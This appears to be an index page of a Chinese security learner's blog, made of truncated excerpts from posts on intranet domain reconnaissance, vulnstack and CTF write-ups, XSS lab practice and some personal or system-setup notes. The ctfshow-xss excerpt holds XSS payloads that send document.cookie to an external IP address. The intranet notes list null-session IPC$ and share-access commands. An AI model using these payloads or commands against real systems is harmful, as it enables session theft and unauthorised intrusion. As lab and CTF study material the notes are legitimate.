内网安全攻防
判断域环境查看网卡 如果存在主dns后缀则很有可能存在域
ipconfig /all
系统信息内会包含域 没域会显示WORDGROUP
systeminfo
查看网络配置 没域会显示WORDGROUP
net config workstation
通过时间查看
net time /domain
查看域控机器名称
nltest /dclist:de1ay
可以看到启动进程的用户 可能有域用户
tasklist /v
信息搜集查看软件、版本
wmic product get name,version
看进程
tasklist /svc
查看域用户
net user /domain
查看防火墙配置
netsh firewall show config
查看域用户详情
net user name /domain
查看开机信息
net statistics workstation
查看计划任务
schtasks /query /fo list /v
查看域控主机名
nltest /DCLIST:域名nslookup -type=SRV _ladp._tcp
查询 ...
小迪(一)
background红日的靶场看官方给的wp 基本就是梭哈 原理也不明白 工具其他的使用方式也不清楚 就想着去看看课吧 看小迪的
https://www.bilibili.com/video/BV123yAYMEwb
131大概看了 没啥东西 就是些基础的权限之类的介绍 就不做记录了
132好像也差不多
133
windows提权土豆家族
补丁查询 把systeminfo的内容放到txt里 然后python跑 重点看impact显示elevation of privilege(权限提升)
https://mp.weixin.qq.com/s/OW4ybuqtErh_ovkTWLSr8w
https://github.com/bitsadmin/wesng
windows下数据库提权
awd展示平台
background就是有炫酷的大屏 给领导看的 一直搭建在vps上 但是这东西要传承 直接做虚拟机系统吧
环境准备centos7的系统
备份源
cp -rp /etc/yum.repos.d/ /etc/yum.repos.d_back
下载
wget -O /etc/yum.repos.d/CentOS-Base.repo http://mirrors.cloud.tencent.com/repo/centos7_base.repowget -O /etc/yum.repos.d/epel.repo http://mirrors.cloud.tencent.com/repo/epel-7.repo
更新
yum clean allyum makecache
关闭防火墙
systemctl stop firewalldsystemctl disable firewalld
设置自动同步时间
yum -y install ntp ntpdateln -sf /usr/share/zoneinfo/Asia/Shanghai /etc/localtimentpdat ...
红日靶场2
background看了官网放的红日一解 感觉之前自己做的太浅了 网上很多文章也是很浅 参考https://mp.weixin.qq.com/s/A3MIuT7RXTIIPNLjF42OTg
记录下一些内网常用的命令
ipconfig /all # 查看本机ip,所在域route print # 打印路由信息net view # 查看局域网内其他主机名arp -a # 查看arp缓存net start # 查看开启了哪些服务net share # 查看开启了哪些共享net share ipc$ # 开启ipc共享net share c$ # 开启c盘共享net use \\192.168.xx.xx\ipc$ "" /user:"" # 与192.168.xx.xx建立空连接net use \\192.168.xx.xx\c$ "密码" /user:"用户名" # 建立c盘共享dir \\192.168.xx.xx\c$ ...
S8强网杯的一些小记
background打的稀烂 记录一下我能理解的题 都是些没啥难度的
Givemesecret不回答就一直刷新重新问
xiaohuanxiong/admin/admins即可未授权访问
源码地址
https://gitee.com/haoyuanma/xiaohuanxiong
https://github.com/carrot-dog/xiaohuanxiong/
我用了这两个源码都不存在未授权访问的问题
漏洞版本https://github.com/forkable/xiaohuanxiong/
搭建参考 我用的宝塔搭建的https://blog.csdn.net/weixin_31040629/article/details/116220194
php7.2 写了伪静态规则 安了redis和php的redis扩展 访问install即可安装
有文章说这里未授权访问的问题是变量重写了 我试着删掉其中一处变量 也还是存在洞 可能是我方法的问题吧 搞不明白这个未授权访问哪来的
至于getshell这里没啥讲的 很基础
snake结束游戏后会显示用户名
...
ctfshow-xss
刷一下ctfshow的xss
xss-lab就是个热身 自己x自己
https://xz.aliyun.com/t/4067
payload
<script>var img=document.createElement("img"); img.src="http://118.31.168.198:39543/"+document.cookie;</script><script>window.open('http://118.31.168.198:39543/'+document.cookie)</script><script>location.href='http://118.31.168.198:39543/'+document.cookie</script><script>window.location.href='http://118.31.168.198:39543/'+document.cook ...
xss-lab
background:昨天看了下网鼎杯 自己挺菜的 没做出来啥题 我一直也没想着往ctf方面深入 学了点简单无脑的东西 知识储备量也不够 ctf这玩意 知识储备很重要 这一两年也算是在一线rt的队伍里(小地方) rt打到现在我不想打了 感觉学不到上面东西 无非就是那点东西 信息搜集 打点 隧道 横向
用着别人的day 自己真的任何提升都没有 目前我的所有事情已经告一段落了 升学的事情基本是稳了的 今天早上本来是想打算过一遍ruoyi的 想多学学实战的东西 前段时间是计划着过红日靶场 我做完了1 感觉其实真的没啥大的提升 脚本小子罢了 百度看看了下xss的教程 看到t4哥的先知了 他真的好厉害啊 ciscn总决赛的题都参考了他的文章(也可能是同时发现的) 既然rt不想搞 只能搞ctf了 升本之后有大把的时间 包括现在我还有大半年 加油吧 希望能在知识上有所提高
先从xss-lab看起
docker没了真的蛋疼啊 最后搞了个hk的机子
xss-lab镜像vulfocus/xss-labs
用这个经典的靶场
level1 直接打直接弹窗
http://8.210.90.129 ...
win11右键风格变win10
background现在的电脑买来都是win11了 虽然我喜欢用win10 但是新机到手是win11 我也不好给他装成win10了
win11的右键很奇怪 要点击“更多选项”才能执行其他操作 很不方便 我以为这是系统特性改不了了 其实是可以改的
参考https://baijiahao.baidu.com/s?id=1799217797207316270&wfr=spider&for=pc
开启旧版右键菜单:reg add "HKCU\Software\Classes\CLSID\{86ca1aa0-34aa-4e8b-a509-50c905bae2a2}\InprocServer32" /f /ve恢复windows11新版右键菜单:reg delete "HKCU\Software\Classes\CLSID\{86ca1aa0-34aa-4e8b-a509-50c905bae2a2}" /f
红日靶场1
background新电脑配置的差不多了 也不知干什么 然后就是想学习一下常见Java类漏洞的打法 结果docker现在这种情况 真的是无语死了
然后就学学内网吧 搭建参考
http://vulnstack.qiyuanxuetang.net/vuln/detail/2/
打点我也尽量黑盒自己去做 不看wp 靶机配置没做什么说明 那就直接三个全开 对着本机c段扫 发现貌似不行 这三个都是默认nat的
参考https://blog.csdn.net/m0_75178803/article/details/136015522 win7双网卡 通本机 win2008,win2k3都接在1交换机上
fscan是真的动不了
goby发现了存活扫不动 后来另一篇文章说要进win7手启phpstudy
登录的时候如果要修改密码 删了虚拟机镜像重新解压再启动 启动不了就重启 要是没网络就新增一个网卡 反正这玩意玄乎的很
启动之后fscan就能扫到了 这里也禁ping了
访问80端口是一个小皮的页面 测了下mysql是root root
开了3306但是上不去
扫了下路径发现有货
...
那年那月那时
background那年 我17 因为热爱与梦想 我去了某个比赛 认识了后面一直在指引我的t4哥
那年10月 我睡在黄浦江边的长凳上 江风刺骨
四年后 我谈了恋爱 有了些收入 也不再像当时那样落魄
拿起当年的玩具 思绪又回到了当年 买了个新壳子 内存卡现在也是真便宜 上了个64gb的
安装这玩意就跟电脑一样的
https://shumeipai.nxez.com/download#os
安装专门的烧录软件Raspberry Pi Imager(以前没用过 这个可以在烧录系统的时候就修改一些设置 很方便)
安装系统 https://downloads.raspberrypi.org/raspios_arm64_latest
烧录即可 选择支持ssh 配置好热点信息 ssh上去即可
换源
sed -i 's/deb.debian.org/mirrors.aliyun.com/g' /etc/apt/sources.listsed -i 's/security.debian.org/mirrors.aliyun.com/g' /etc/apt ...